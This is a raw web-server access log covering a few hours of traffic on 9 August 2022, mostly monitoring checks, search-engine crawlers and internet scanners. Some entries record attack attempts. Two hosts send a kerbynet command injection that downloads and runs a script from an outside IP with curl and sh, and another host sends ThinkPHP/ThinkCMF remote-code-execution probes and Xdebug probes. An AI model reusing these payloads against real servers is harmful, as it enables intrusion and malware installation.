66.249.83.102 - - [09/Aug/2022:04:14:13 +0200] "HEAD /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 0 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
195.56.55.225 - - [09/Aug/2022:04:14:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:04:16:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:04:18:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:04:20:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:04:22:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.153 - - [09/Aug/2022:04:24:12 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
128.1.248.26 - - [09/Aug/2022:04:24:13 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
195.56.55.225 - - [09/Aug/2022:04:24:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:04:26:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.11 - - [09/Aug/2022:04:27:10 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:04:29:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:04:31:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.146 - - [09/Aug/2022:04:32:38 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:04:33:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:04:35:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:04:37:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:04:39:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.18 - - [09/Aug/2022:04:40:12 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:04:41:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.196.220.70 - - [09/Aug/2022:04:43:14 +0200] "GET / HTTP/1.1" 200 1155 "-" "Linux Gnu (cow)"
195.56.55.225 - - [09/Aug/2022:04:43:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.34 - - [09/Aug/2022:04:45:16 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:04:45:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.29 - - [09/Aug/2022:04:45:32 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:04:47:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:04:47:58 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [09/Aug/2022:04:49:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
77.88.5.2 - - [09/Aug/2022:04:50:17 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.5.2 - - [09/Aug/2022:04:50:21 +0200] "GET /cikk.php3?id_article=235 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
195.56.55.225 - - [09/Aug/2022:04:51:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
192.241.222.206 - - [09/Aug/2022:04:53:45 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 zgrab/0.x"
195.56.55.225 - - [09/Aug/2022:04:53:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
192.241.222.206 - - [09/Aug/2022:04:53:54 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [09/Aug/2022:04:54:53 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [09/Aug/2022:04:55:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:04:57:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
40.77.167.100 - - [09/Aug/2022:04:57:57 +0200] "GET /robots.txt HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.56 - - [09/Aug/2022:04:58:09 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
195.56.55.225 - - [09/Aug/2022:04:59:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.143.200.118 - - [09/Aug/2022:05:00:40 +0200] "\x03" 501 - "-" "-"
195.56.55.225 - - [09/Aug/2022:05:02:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:04:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.131 - - [09/Aug/2022:05:05:50 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:05:06:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
140.206.86.124 - - [09/Aug/2022:05:07:23 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 276 "-" "-"
103.40.172.189 - - [09/Aug/2022:05:07:24 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 276 "-" "-"
195.56.55.225 - - [09/Aug/2022:05:08:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:10:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:12:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:14:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.27 - - [09/Aug/2022:05:15:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:05:16:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:18:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:20:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.89.14 - - [09/Aug/2022:05:21:52 +0200] "GET / HTTP/1.1" 200 1155 "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
154.54.249.196 - - [09/Aug/2022:05:22:34 +0200] "GET /robots.txt HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:05:22:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
216.131.84.93 - - [09/Aug/2022:05:23:20 +0200] "GET /maxigas/ HTTP/1.1" 404 281 "http://hi.zpok.hu" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
216.131.84.93 - - [09/Aug/2022:05:23:20 +0200] "GET /maxigas/ HTTP/1.1" 404 281 "http://hi.zpok.hu" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
216.131.84.93 - - [09/Aug/2022:05:23:21 +0200] "GET /maxigas/ HTTP/1.1" 404 281 "http://hi.zpok.hu" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
216.131.84.93 - - [09/Aug/2022:05:23:21 +0200] "GET /maxigas/ HTTP/1.1" 404 281 "http://hi.zpok.hu" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
154.54.249.196 - - [09/Aug/2022:05:24:50 +0200] "GET /robots.txt HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:05:25:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:05:25:35 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
154.54.249.196 - - [09/Aug/2022:05:26:14 +0200] "GET /robots.txt HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:05:27:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:29:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:31:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:05:31:36 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
198.235.24.16 - - [09/Aug/2022:05:31:53 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.16 - - [09/Aug/2022:05:31:53 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
154.54.249.196 - - [09/Aug/2022:05:32:16 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
154.54.249.196 - - [09/Aug/2022:05:33:07 +0200] "GET /people.html HTTP/1.1" 404 288 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:05:33:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:05:34:34 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
154.54.249.196 - - [09/Aug/2022:05:35:16 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:05:35:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:05:36:05 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
207.46.13.229 - - [09/Aug/2022:05:37:14 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.217 - - [09/Aug/2022:05:37:21 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
195.56.55.225 - - [09/Aug/2022:05:37:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:39:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:05:41:19 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
178.73.215.171 - - [09/Aug/2022:05:41:38 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
195.56.55.225 - - [09/Aug/2022:05:41:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:05:42:10 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
154.54.249.196 - - [09/Aug/2022:05:42:55 +0200] "GET /dmp/radio.blog/?autoplay=8 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
154.54.249.196 - - [09/Aug/2022:05:43:38 +0200] "GET /anthropolis/galeria/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:05:43:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:05:44:28 +0200] "GET /civilink/?T__:L__:LHU HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
205.210.31.19 - - [09/Aug/2022:05:45:26 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:05:46:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:48:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
74.125.151.23 - - [09/Aug/2022:05:48:12 +0200] "GET /maxigas/blog/maxigas.xml HTTP/1.1" 404 297 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
154.54.249.196 - - [09/Aug/2022:05:49:00 +0200] "GET /cikk.php3?id_article=104 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
17.121.114.131 - - [09/Aug/2022:05:49:36 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.121.114.131 - - [09/Aug/2022:05:49:36 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
154.54.249.196 - - [09/Aug/2022:05:49:53 +0200] "GET /indy/fnb/index.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:05:50:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.127 - - [09/Aug/2022:05:51:52 +0200] "GET /filmtext/2005-2006/Tavasz/Mediaelm2/Hanak-Operett.rtf HTTP/1.1" 404 330 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
195.56.55.225 - - [09/Aug/2022:05:52:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:54:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:05:54:16 +0200] "GET /cikk.php3?id_article=445 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
154.54.249.196 - - [09/Aug/2022:05:55:05 +0200] "GET /maxigas/pick/text.html HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:05:56:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:05:58:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.22 - - [09/Aug/2022:05:59:33 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
154.54.249.196 - - [09/Aug/2022:05:59:47 +0200] "GET /cikk.php3?id_article=103 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
154.54.249.196 - - [09/Aug/2022:06:00:23 +0200] "GET /indy/spectaculum/spectaculum.mpg HTTP/1.1" 404 305 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:06:00:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:02:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:06:02:37 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
114.119.130.169 - - [09/Aug/2022:06:03:27 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
154.54.249.196 - - [09/Aug/2022:06:04:19 +0200] "GET /cikk.php3?id_article=1099 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:06:04:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:06:04:56 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
205.210.31.129 - - [09/Aug/2022:06:06:16 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:06:06:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:06:08:05 +0200] "GET /cikk.php3?id_article=927 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:06:08:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.143.200.118 - - [09/Aug/2022:06:08:44 +0200] "\x03" 501 - "-" "-"
195.56.55.225 - - [09/Aug/2022:06:10:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:06:11:58 +0200] "GET /cikk.php3?id_article=779 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:06:12:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:14:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:06:15:08 +0200] "GET /cikk.php3?id_article=1191 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
205.210.31.131 - - [09/Aug/2022:06:16:38 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:06:16:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:06:17:19 +0200] "GET /cikk.php3?id_article=1150 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:06:18:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.7.214.104 - - [09/Aug/2022:06:18:56 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
154.54.249.196 - - [09/Aug/2022:06:19:30 +0200] "GET /cikk.php3?id_article=755 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
205.210.31.15 - - [09/Aug/2022:06:21:00 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:06:21:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:06:21:49 +0200] "GET /cikk.php3?id_article=486 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
205.210.31.136 - - [09/Aug/2022:06:21:50 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:06:23:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:06:24:04 +0200] "GET /cikk.php3?id_article=571 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:06:25:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:06:26:22 +0200] "GET /cikkek.php3?id_rubrique=10 HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:06:27:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.54.249.196 - - [09/Aug/2022:06:28:39 +0200] "GET /forum_attac.php3?id_article=94&retour=cikk.php3%3Fid_article%3D94 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
195.56.55.225 - - [09/Aug/2022:06:29:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:31:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
107.182.129.137 - - [09/Aug/2022:06:31:51 +0200] "GET / HTTP/1.1" 200 1155 "-" "Linux Gnu (cow)"
198.235.24.17 - - [09/Aug/2022:06:33:12 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:06:33:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:35:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.25 - - [09/Aug/2022:06:35:53 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [09/Aug/2022:06:37:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:39:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:41:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:44:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:46:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:48:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
107.182.129.137 - - [09/Aug/2022:06:49:55 +0200] "GET / HTTP/1.1" 200 1155 "-" "Linux Gnu (cow)"
195.56.55.225 - - [09/Aug/2022:06:50:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:52:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:54:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.19 - - [09/Aug/2022:06:55:50 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.7.214.104 - - [09/Aug/2022:06:56:15 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [09/Aug/2022:06:56:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:06:58:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [09/Aug/2022:07:00:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
